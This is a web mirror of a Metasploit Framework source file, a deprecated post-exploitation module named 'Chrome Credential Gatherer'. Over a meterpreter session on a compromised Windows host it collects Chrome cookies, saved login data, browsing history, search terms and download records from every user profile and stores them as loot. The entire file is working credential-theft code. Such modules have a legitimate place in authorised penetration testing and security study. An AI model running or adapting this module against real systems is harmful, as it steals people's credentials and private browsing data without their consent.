Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/chrome.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  include Msf::Exploit::Deprecated

11


12
  deprecated nil, 'The post/windows/gather/enum_browsers module now supersedes this module'

13


14
  ARTIFACTS =

15
    {

16
      application: 'chrome',

17
      app_category: 'browsers',

18
      gatherable_artifacts: [

19
        {

20
          filetypes: 'cookies',

21
          path: 'LocalAppData',

22
          dir: 'Google',

23
          artifact_file_name: 'Cookies',

24
          description: "Chrome's Cookies",

25
          credential_type: 'sqlite',

26
          sql_search: [

27
            {

28
              sql_description: "Database Commands which exports Chrome's Cookie data",

29
              sql_table: 'cookies',

30
              sql_column: 'host_key, name, path'

31
            }

32
          ]

33
        },

34
        {

35
          filetypes: 'logins',

36
          path: 'LocalAppData',

37
          dir: 'Google',

38
          artifact_file_name: 'Login Data',

39
          description: "Chrome's saved Username and Passwords",

40
          credential_type: 'sqlite',

41
          sql_search: [

42
            {

43
              sql_description: "Database Commands which exports Chrome's Login data",

44
              sql_table: 'logins',

45
              sql_column: 'username_value, action_url'

46
            }

47
          ]

48
        },

49
        {

50
          filetypes: 'web_history',

51
          path: 'LocalAppData',

52
          dir: 'Google',

53
          artifact_file_name: 'History',

54
          description: "Chrome's History",

55
          credential_type: 'sqlite',

56
          sql_search: [

57
            {

58
              sql_description: "Database Commands which exports Chrome's Login data",

59
              sql_table: 'urls',

60
              sql_column: 'url'

61
            },

62
            {

63
              sql_description: "Database Commands which exports Chrome's Login data",

64
              sql_table: 'keyword_search_terms',

65
              sql_column: 'lower_term'

66
            },

67
            {

68
              sql_description: "Database Commands which exports Chrome's Login data",

69
              sql_table: 'downloads',

70
              sql_column: 'current_path, tab_referrer_url'

71
            },

72
            {

73
              sql_description: "Database Commands which exports Chrome's Login data",

74
              sql_table: 'segments',

75
              sql_column: 'name'

76
            },

77
            {

78
              sql_description: "Database Commands which exports Chrome's Login data",

79
              sql_table: 'downloads_url_chains',

80
              sql_column: 'url'

81
            }

82
          ]

83
        }

84
      ]

85
    }.freeze

86


87
  def initialize(info = {})

88
    super(

89
      update_info(

90
        info,

91
        'Name' => 'Chrome Credential Gatherer',

92
        'Description' => %q{

93
          This module searches for credentials stored on Chrome on a Windows host.

94
        },

95
        'License' => MSF_LICENSE,

96
        'Author' => [

97
          'Kazuyoshi Maruta',

98
          'Daniel Hallsworth',

99
          'Barwar Salim M',

100
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

101
        ],

102
        'Platform' => ['win'],

103
        'SessionTypes' => ['meterpreter'],

104
        'Notes' => {

105
          'Stability' => [CRASH_SAFE],

106
          'Reliability' => [],

107
          'SideEffects' => []

108
        }

109
      )

110
    )

111


112
    register_options(

113
      [

114
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

115
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

116
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

117
        # enumerates the options based on the artifacts that are defined below

118
        OptEnum.new('ARTIFACTS', [

119
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|

120
                                                          k[:filetypes]

121
                                                        end.uniq.unshift('All')

122
        ])

123
      ]

124
    )

125
  end

126


127
  def run

128
    print_status('Filtering based on these selections:  ')

129
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

130
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

131
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

132


133
    # used to grab files for each user on the remote host

134
    grab_user_profiles.each do |userprofile|

135
      run_packrat(userprofile, ARTIFACTS)

136
    end

137


138
    print_status 'PackRat credential sweep completed'

139
  end

140
end

141


142